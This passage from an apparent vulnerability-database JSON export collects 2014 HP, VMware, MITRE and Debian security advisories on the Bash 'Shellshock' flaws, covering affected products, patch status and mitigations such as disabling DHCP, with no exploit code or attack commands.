Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlQuzswACgkQ4B86/C0qfVlEmwCeKmjiIhep4sXipKg6EBSF8f5L\r\nmYcAnRPAcBRS9bs0c+WaszC9E7lEhSC/\r\n=dPt5\r\n-----END PGP SIGNATURE-----\r\n\r\n", "cvss3": {}, "published": "2014-10-05T00:00:00", "type": "securityvulns", "title": "[security bulletin] HPSBHF03124 rev.1 - HP Thin Clients running Bash, Remote Execution of Code", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2014-10-05T00:00:00", "id": "SECURITYVULNS:DOC:31125", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31125", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04468293\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04468293\r\nVersion: 2\r\n\r\nHPSBHF03119 rev.2 - HP DreamColor Professional Display running Bash Shell,\r\nRemote Code Execution\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-09-30\r\nLast Updated: 2014-10-01\r\n\r\nPotential Security Impact: Remote code execution\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP DreamColor\r\nZ27x Professional Display running Bash Shell . 
This is the Bash Shell\r\nvulnerability known as "ShellShock" which could be exploited remotely to\r\nallow execution of code.\r\n\r\nNOTE: Only the HP DreamColor Z27x model is vulnerable.\r\n\r\nReferences:\r\n\r\nCVE-2014-6271\r\nCVE-2014-7169\r\nSSRT101725\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\n\r\nHP DreamColor Z27x\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted product\r\nversions of HP DreamColor Z27x Professional Display. The display provides\r\ncalibration and remote management functionality running on embedded Linux,\r\nwhich includes a bash shell. The shell is not accessible via the standard\r\ncalibration or remote management interfaces.\r\n\r\nThis bulletin will be revised when the firmware update is released.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 September 2014 Initial release\r\nVersion:2 (rev.2) - 1 October 2014 Clarified Resolution\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlQsiJAACgkQ4B86/C0qfVkNaACguv7uwEW8LXyHRpAZ7rsOihoS\r\nmTcAn1o+pVwNz5a5E5FKWg/w0fJHt0Sx\r\n=6l1G\r\n-----END PGP SIGNATURE-----\r\n\r\n", "cvss3": {}, "published": "2014-10-05T00:00:00", "type": "securityvulns", "title": "[security bulletin] HPSBHF03119 rev.2 - HP DreamColor Professional Display running Bash Shell, Remote Code Execution", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2014-10-05T00:00:00", "id": "SECURITYVULNS:DOC:31130", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31130", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04471532\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04471532\r\nVersion: 1\r\n\r\nHPSBST03122 rev.1 - HP StoreAll Operating System Software running Bash Shell,\r\nRemote Code Execution\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-10-09\r\nLast Updated: 2014-10-09\r\n\r\nPotential Security Impact: Remote code execution\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP StoreAll\r\nOperating System Software running Bash Shell. 
This is the Bash Shell\r\nvulnerability known as "Shellshock" which could be exploited remotely to\r\nallow execution of code.\r\n\r\nReferences:\r\n\r\n CVE-2014-6271\r\n\r\n CVE-2014-7169\r\n\r\n SSRT101717\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP StoreAll Operating System Software v6.5.3 and earlier.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software updates available to resolve the\r\nvulnerability with HP StoreAll Operating System Software running Bash Shell.\r\n\r\n - HP StoreAll OS v6.5.5\r\n\r\n - HP StoreAll OS v6.3.4\r\n\r\n Note: HP StoreAll OS v6.3.4 will be available soon. This security\r\nbulletin will be revised when it is available.\r\n\r\n To request an upgrade or installation:\r\n\r\n 1. Go to: http://www.hp.com/support/storeallsoftware\r\n\r\n 2. Under Download Index, select Software, then select Obtain software.\r\n\r\n 3. Complete the software registration form, and the HP StoreAll\r\nadministrator will contact you for the next steps.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 9 October 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlQ3EYoACgkQ4B86/C0qfVlGiwCg5w4oGFIiHcG0BQW5u4uoPxef\r\nzhMAoNKjX1w2l4V/RvE12LAfaB6he8Ak\r\n=V6d1\r\n-----END PGP SIGNATURE-----\r\n\r\n", "cvss3": {}, "published": "2014-10-13T00:00:00", "type": "securityvulns", "title": "[security bulletin] HPSBST03122 rev.1 - HP StoreAll Operating System Software running Bash Shell, Remote Code Execution", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2014-10-13T00:00:00", "id": "SECURITYVULNS:DOC:31150", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31150", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04467807\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04467807\r\nVersion: 1\r\n\r\nHPSBGN03117 rev.1 - HP Remote Device Access: Virtual Customer Access System\r\n(vCAS) running Bash Shell, Remote Code Execution\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-09-30\r\nLast Updated: 2014-09-30\r\n\r\nPotential Security Impact: Remote code execution\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Remote Device\r\nAccess: Virtual Customer Access System (vCAS) running Bash Shell . 
This is\r\nthe Bash Shell vulnerability known as "ShellShock" which could be exploited\r\nremotely to allow execution of code.\r\n\r\n NOTE: The vCAS product is vulnerable only if DHCP is enabled.\r\n\r\nReferences:\r\n\r\nCVE-2014-6271\r\nCVE-2014-7169\r\nSSRT101724\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\n\r\nvCAS version 14.06 (RDA 8.1)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted product\r\nversions of HP Remote Device Access: Virtual Customer Access System (vCAS)\r\nrunning Bash Shell. This bulletin will be revised when the software update is\r\nreleased.\r\n\r\nNOTE: HP recommends to not power-down or disconnect the vCAS until the update\r\nis available.\r\n\r\nMITIGATION INFORMATION\r\n\r\nA Shellshock attack requires the definition of an environment variable\r\nintroduced into Bash. The vCAS has three attack vectors: SSH, the lighttpd\r\nweb server, and the DHCP client.\r\n\r\n - The exploit does not elevate privileges.\r\n - The SSH and webserver exploits require vCAS credentials so there is no\r\nrisk for unauthorized access or code execution through this vulnerability.\r\n\r\nThe DHCP client uses Bash scripts and is vulnerable to Shellshock. The DHCP\r\nexploit can be mitigated by ensuring that DHCP is disabled on the vCAS.\r\n\r\n Note: HP strongly discourages the use of DHCP on the vCAS.\r\n\r\nThe web UI forces the vCAS user to assign a static IP address and change the\r\nhp-admin password. 
A vCAS user must manually configure DHCP for use on the\r\nvCAS.\r\n\r\nA vCAS user can verify that DHCP is disabled by inspecting the file\r\n"/etc/network/interfaces" and ensuring that the "iface" line for device\r\n"eth0" is set for a static IP.\r\n\r\n Example of a static IP configuration:\r\n\r\n # The primary network interface\r\n auto eth0\r\n iface eth0 inet static\r\n address 172.27.1.68\r\n netmask 255.255.255.0\r\n gateway 172.27.1.1\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 September 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be 
liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlQrBP4ACgkQ4B86/C0qfVmXyQCfcKhAA0uY3dImfSwtEVk8Za3c\r\nvj4AnjNi4SmLcQFrPcGjdzRDt8U1OGS/\r\n=6Tia\r\n-----END PGP SIGNATURE-----\r\n\r\n", "cvss3": {}, "published": "2014-10-05T00:00:00", "type": "securityvulns", "title": "[security bulletin] HPSBGN03117 rev.1 - HP Remote Device Access: Virtual Customer Access System (vCAS) running Bash Shell, Remote Code Execution", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2014-10-05T00:00:00", "id": "SECURITYVULNS:DOC:31135", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31135", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nVMware Security Advisory\r\n\r\nAdvisory ID: VMSA-2014-0010\r\nSynopsis: VMware product updates address critical Bash \r\n security vulnerabilities\r\nIssue date: 2014-09-30\r\nUpdated on: 2014-09-30 (Initial Advisory)\r\nCVE 
numbers: CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, \r\n CVE-2014-7187\r\n- ------------------------------------------------------------------------\r\n\r\n1. Summary\r\n\r\n VMware product updates address Bash security vulnerabilities.\r\n\r\n2. Relevant Releases (Affected products for which remediation is present)\r\n\r\n vCenter Log Insight 2.0\r\n\r\n3. Problem Description \r\n\r\n a. Bash update for multiple products.\r\n\r\n Bash libraries have been updated in multiple products to resolve \r\n multiple critical security issues, also referred to as Shellshock.\r\n \r\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\r\n has assigned the identifiers CVE-2014-6271, CVE-2014-7169, \r\n CVE-2014-7186, and CVE-2014-7187 to these issues.\r\n\r\n VMware products have been grouped into the following four\r\n product categories:\r\n \r\n I) ESXi and ESX Hypervisor\r\n ESXi is not affected because ESXi uses the Ash shell (through\r\n busybox), which is not affected by the vulnerability reported\r\n for the Bash shell.\r\n ESX has an affected version of the Bash shell. See table 1 for\r\n remediation for ESX.\r\n \r\n II) Windows-based products\r\n Windows-based products, including all versions of vCenter Server \r\n running on Windows, are not affected.\r\n\r\n III) VMware (virtual) appliances\r\n VMware (virtual) appliances ship with an affected version of Bash. \r\n See table 2 for remediation for appliances.\r\n \r\n IV) Products that run on Linux, Android, OSX or iOS (excluding\r\nvirtual\r\n appliances)\r\n\r\n Products that run on Linux, Android, OSX or iOS (excluding \r\n virtual appliances) might use the Bash shell that is part of the\r\n operating system. If the operating system has a vulnerable\r\n version of Bash, the Bash security vulnerability might be\r\n exploited through the product. VMware recommends that customers\r\n contact their operating system vendor for a patch. 
\r\n \r\n MITIGATIONS\r\n\r\n VMware encourages restricting access to appliances through\r\n firewall rules and other network layer controls to only trusted IP\r\n addresses. This measure will greatly reduce any risk to these\r\n appliances.\r\n\r\n RECOMMENDATIONS\r\n\r\n VMware recommends customers evaluate and deploy patches for\r\n affected products in Table 1 and 2 below as these\r\n patches become available. \r\n\r\n Column 4 of the following tables lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available.\r\n\r\n Table 1 - ESXi and ESX Hypervisor\r\n =================================\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch \r\n ============== ======= ======= =============\r\n ESXi any ESXi Not affected\r\n\r\n ESX 4.1 ESX Patch pending *\r\n\r\n ESX 4.0 ESX Patch pending *\r\n\r\n * VMware will make VMware ESX 4.0 and 4.1 security patches available \r\n for the Bash shell vulnerability. This security patch release is an \r\n exception to the existing VMware lifecycle policy. \r\n\r\n Table 2 - Products that are shipped as a (virtual) appliance. 
\r\n =============================================================\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch \r\n ============== ======= ======= =============\r\n \r\n vCenter Server Appliance 5.x Linux Patch Pending\r\n Horizon DaaS Platform 6.x Linux Patch Pending\r\n Horizon Workspace 1.x, 2.x Linux Patch Pending\r\n IT Business Management Suite 1.x Linux Patch Pending\r\n NSX for Multi-Hypervisor 4.x Linux Patch Pending\r\n NSX for vSphere 6.x Linux Patch Pending\r\n NVP 3.x Linux Patch Pending\r\n vCenter Converter Standalone 5.x Linux Patch Pending \r\n vCenter Hyperic Server 5.x Linux Patch Pending\r\n vCenter Infrastructure Navigator 5.x Linux Patch Pending\r\n vCenter Log Insight 1.x, 2.x Linux 2.0 U1\r\n vCenter Operations Manager 5.x Linux Patch Pending\r\n vCenter Orchestrator Appliance 4.x, 5.x Linux Patch Pending\r\n vCenter Site Recovery Manager 5.x Linux Patch Pending\r\n**\r\n vCenter Support Assistant 5.x Linux Patch Pending\r\n vCloud Automation Center 6.x Linux Patch Pending\r\n vCloud Automation Center\r\n Application Services 6.x Linux Patch Pending\r\n vCloud Director Appliance 5.x Linux Patch Pending\r\n vCloud Connector 2.x Linux Patch Pending\r\n vCloud Networking and Security 5.x Linux Patch Pending\r\n vCloud Usage Meter 3.x Linux Patch Pending\r\n vFabric Application Director 5.x, 6.x Linux Patch Pending\r\n vFabric Postgres 9.x Linux Patch Pending\r\n Viewplanner 3.x Linux Patch Pending\r\n VMware Application Dependency \r\n Planner x.x Linux Patch Pending\r\n VMware Data Recovery 2.x Linux Patch Pending\r\n VMware HealthAnalyzer 5.x Linux Patch Pending\r\n VMware Mirage Gateway 5.x Linux Patch Pending\r\n VMware Socialcast On Premise x.x Linux Patch Pending\r\n VMware Studio 2.x Linux Patch Pending\r\n VMware TAM Data Manager x.x Linux Patch Pending\r\n VMware Workbench 3.x Linux Patch Pending\r\n vSphere App HA 1.x Linux Patch Pending\r\n vSphere Big Data Extensions 1.x, 2.x Linux Patch 
Pending\r\n vSphere Data Protection 5.x Linux Patch Pending\r\n vSphere Management Assistant 5.x Linux Patch Pending\r\n vSphere Replication 5.x Linux Patch Pending\r\n vSphere Storage Appliance 5.x Linux Patch Pending\r\n\r\n ** This product includes Virtual Appliances that will be updated, the\r\nproduct \r\n itself is not a Virtual Appliance.\r\n\r\n 4. Solution\r\n\r\n vCenter Log Insight\r\n ----------------------------\r\n Downloads:\r\n https://www.vmware.com/go/download-vcenter-log-insight\r\n (click Go to Downloads)\r\n Documentation:\r\n http://kb.vmware.com/kb/2091065\r\n\r\n5. References\r\n \r\n VMware Knowledge Base Article 2090740\r\n http://kb.vmware.com/kb/2090740\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 , \r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187\r\n\r\n- ------------------------------------------------------------------------\r\n\r\n6. Change Log\r\n\r\n 2014-09-30 VMSA-2014-0010\r\n Initial security advisory in conjunction with the release of\r\n vCenter Log Insight 2.0 U1 on 2014-09-30.\r\n\r\n- ------------------------------------------------------------------------\r\n\r\n \r\n7. 
Contact\r\n\r\n E-mail list for product security notifications and announcements:\r\n http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\r\n\r\n This Security Advisory is posted to the following lists:\r\n\r\n security-announce at lists.vmware.com\r\n bugtraq at securityfocus.com\r\n fulldisclosure at seclists.org\r\n\r\n E-mail: security at vmware.com\r\n PGP key at: http://kb.vmware.com/kb/1055\r\n\r\n VMware Security Advisories\r\n http://www.vmware.com/security/advisories\r\n\r\n VMware Security Response Policy\r\n https://www.vmware.com/support/policies/security_response.html\r\n\r\n VMware Lifecycle Policy\r\n https://www.vmware.com/support/policies/lifecycle.html\r\n \r\n Twitter\r\n https://twitter.com/VMwareSRC\r\n\r\n Copyright 2014 VMware Inc. All rights reserved.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: Encryption Desktop 10.3.2 (Build 15337)\r\nCharset: utf-8\r\n\r\nwj8DBQFUK2DqDEcm8Vbi9kMRAg4rAJ9wKbbbxeD3cagCry7GGfR4fVLpDwCeMqYm\r\nSfX/140WMvqvcmkPX2chR9s=\r\n=1KVR\r\n-----END PGP SIGNATURE-----\r\n\r\n", "cvss3": {}, "published": "2014-10-05T00:00:00", "type": "securityvulns", "title": "NEW VMSA-2014-0010 - VMware product updates address critical Bash security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2014-10-05T00:00:00", "id": "SECURITYVULNS:DOC:31131", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31131", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nMITRE is currently using CVE-2014-7169 to track the report of the\r\nincomplete patch, i.e., incorrect function parsing that's present in\r\nbuilds that are up-to-date with the\r\nhttp://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-025 changes. 
We\r\nrealize that other people may be releasing further information about\r\nthe technical details and implications later. CVE-2014-7169 expresses\r\nthe affected upstream versions as "GNU Bash through 4.3 bash43-025" --\r\nin general, this would include distribution packages released earlier\r\ntoday (2014-09-24).\r\n\r\n- -- \r\nCVE assignment team, MITRE CVE Numbering Authority\r\nM/S M300\r\n202 Burlington Road, Bedford, MA 01730 USA\r\n[ PGP key available through http://cve.mitre.org/cve/request_id.html ]\r\n", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "securityvulns", "title": "[oss-security] Re: CVE-2014-6271: remote code execution through bash", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2014-09-25T00:00:00", "id": "SECURITYVULNS:DOC:31106", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31106", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2021-10-23T22:37:18", "description": "Package : bash\nVersion : 4.1-3+deb6u2\nCVE ID : CVE-2014-7169\nDebian Bug : 762760 762761\n\nTavis Ormandy discovered that the patch applied to fix CVE-2014-6271\nreleased in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169). 
With this update prefix and suffix\nfor environment variable names which contain shell functions are added\nas hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat's internal analysis for these\nissues and also independently reported by Todd Sabin.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-09-25T22:35:21", "type": "debian", "title": "[SECURITY] [DLA 63-1] bash security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-25T22:35:21", "id": "DEBIAN:DLA-63-1:7012F", "href": "https://lists.debian.org/debian-lts-announce/2014/09/msg00020.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-02T16:25:06", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3035-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nSeptember 25, 2014 http://www.debian.org/security/faq\n- 
-------------------------------------------------------------------------\n\nPackage : bash\nCVE ID : CVE-2014-7169\nDebian Bug : 762760 762761\n\nTavis Ormandy discovered that the patch applied to fix CVE-2014-6271\nreleased in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169). With this update prefix and suffix\nfor environment variable names which contain shell functions are added\nas hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat's internal analysis for these\nissues and also independently reported by Todd Sabin.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 4.2+dfsg-0.1+deb7u3.\n\nWe recommend that you upgrade your bash packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2014-09-25T21:18:46", "type": "debian", "title": "[SECURITY] [DSA 3035-1] bash security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, 
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-25T21:18:46", "id": "DEBIAN:DSA-3035-1:8A617", "href": "https://lists.debian.org/debian-security-announce/2014/msg00223.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-21T23:03:37", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3035-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nSeptember 25, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : bash\nCVE ID : CVE-2014-7169\nDebian Bug : 762760 762761\n\nTavis Ormandy discovered that the patch applied to fix CVE-2014-6271\nreleased in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169). 
With this update prefix and suffix\nfor environment variable names which contain shell functions are added\nas hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat's internal analysis for these\nissues and also independently reported by Todd Sabin.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 4.2+dfsg-0.1+deb7u3.\n\nWe recommend that you upgrade your bash packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": 